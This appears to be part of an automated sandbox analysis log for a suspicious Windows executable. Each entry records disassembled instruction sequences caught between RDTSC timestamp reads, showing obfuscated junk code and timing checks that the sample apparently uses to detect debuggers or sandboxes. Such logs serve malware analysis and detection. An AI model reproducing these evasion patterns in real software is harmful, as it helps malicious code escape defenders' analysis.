              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D85C second address: EF60F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F88DD0CB148h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D2C1Fh], ecx 0x0000002d lea eax, dword ptr [ebp+124881C4h] 0x00000033 sub edx, dword ptr [ebp+122D2DCCh] 0x00000039 jmp 00007F88DD0CB14Ch 0x0000003e nop 0x0000003f jg 00007F88DD0CB14Ah 0x00000045 push eax 0x00000046 pushad 0x00000047 push ebx 0x00000048 push ecx 0x00000049 pop ecx 0x0000004a pop ebx 0x0000004b jmp 00007F88DD0CB155h 0x00000050 popad 0x00000051 nop 0x00000052 mov dword ptr [ebp+122D2FE9h], esi 0x00000058 call dword ptr [ebp+122D1F12h] 0x0000005e pushad 0x0000005f jmp 00007F88DD0CB152h 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4E870 second address: F4E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F88DC6CD03Bh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EB7E second address: F4EB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EB82 second address: F4EBB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F88DC6CD041h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 js 00007F88DC6CD036h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBB3 second address: F4EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBB7 second address: F4EBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DC6CD040h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F88DC6CD043h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBE6 second address: F4EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED3F second address: F4ED48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED48 second address: F4ED50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED50 second address: F4ED54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED54 second address: F4ED58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFDA second address: F4EFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFDE second address: F4EFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFE4 second address: F4EFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFED second address: F4F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F88DD0CB14Dh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F003 second address: F4F029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F88DC6CD042h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F308 second address: F4F30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F30C second address: F4F316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4F316 second address: F4F31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F539FB second address: F53A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A05 second address: F53A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F88DD0CB146h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A13 second address: F53A38 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F88DC6CD036h 0x00000008 jmp 00007F88DC6CD045h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A38 second address: F53A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A3E second address: F53A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A42 second address: F53A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A48 second address: F53A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F88DC6CD036h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A5C second address: F53A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F53A66 second address: F53A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ECA043 second address: ECA06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F88DD0CB155h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ECA06C second address: ECA072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F585B6 second address: F585C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DD0CB146h 0x00000008 jc 00007F88DD0CB146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F58744 second address: F58755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F88DC6CD03Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AFAD second address: F5AFB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC29 second address: F5AC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC2D second address: F5AC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F88DD0CB146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC3D second address: F5AC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC47 second address: F5AC66 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88DD0CB146h 0x00000008 jmp 00007F88DD0CB155h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5AC66 second address: F5AC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F88DC6CD041h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnl 00007F88DC6CD036h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F5C57D second address: F5C59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F88DD0CB150h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F60EC8 second address: F60ECD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F60977 second address: F60993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB154h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65067 second address: F65075 instructions: 0x00000000 rdtsc 0x00000002 je 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65075 second address: F65079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65079 second address: F65090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65090 second address: F65097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65097 second address: F6509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65589 second address: F655A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB156h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F655A3 second address: F655B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F655B1 second address: F655B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65756 second address: F6575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F6575C second address: F65762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65762 second address: F65767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F65767 second address: F6576C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D212 second address: F0D216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D216 second address: F0D21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D21C second address: F0D23A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88DC6CD03Ch 0x00000008 jnl 00007F88DC6CD036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F88DC6CD03Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D23A second address: F0D2C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F88DD0CB148h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+12488203h] 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F88DD0CB148h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov ecx, dword ptr [ebp+122D3866h] 0x00000049 add eax, ebx 0x0000004b movsx edx, cx 0x0000004e push eax 0x0000004f js 00007F88DD0CB156h 0x00000055 jmp 00007F88DD0CB150h 0x0000005a mov dword ptr [esp], eax 0x0000005d mov edx, ebx 0x0000005f push 00000004h 0x00000061 jmp 00007F88DD0CB14Ah 0x00000066 nop 0x00000067 jl 00007F88DD0CB15Ah 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F658FD second address: F6591A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F88DC6CD036h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F66434 second address: F66448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB14Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F66448 second address: F66479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD048h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F88DC6CD040h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F66479 second address: F6647F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F6647F second address: F66484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F66484 second address: F66489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F6A53D second address: F6A558 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F88DC6CD036h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F88DC6CD03Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69A85 second address: F69A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69A8D second address: F69AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 jo 00007F88DC6CD036h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jno 00007F88DC6CD036h 0x00000016 pop edx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69AB7 second address: F69ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69ACF second address: F69AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69AD5 second address: F69ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F69C62 second address: F69C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007F88DC6CD036h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F72781 second address: F727AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F88DD0CB158h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 js 00007F88DD0CB146h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7096E second address: F70978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F70F84 second address: F70F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F70F8E second address: F70FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F88DC6CD045h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F70FC2 second address: F70FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 je 00007F88DD0CB146h 0x0000000e jmp 00007F88DD0CB151h 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F70FE2 second address: F70FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F712DC second address: F712FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F88DD0CB146h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F712FB second address: F71301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F71301 second address: F71305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F71305 second address: F7130B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F71630 second address: F71639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F721A6 second address: F721B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88DC6CD036h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F721B2 second address: F721C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F88DD0CB14Eh 0x00000008 jnp 00007F88DD0CB146h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7AB6A second address: F7AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F88DC6CD03Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7AB79 second address: F7AB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F88DD0CB154h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F79D2B second address: F79D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F79FD5 second address: F79FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F88DD0CB14Bh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F79FE7 second address: F7A002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD047h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
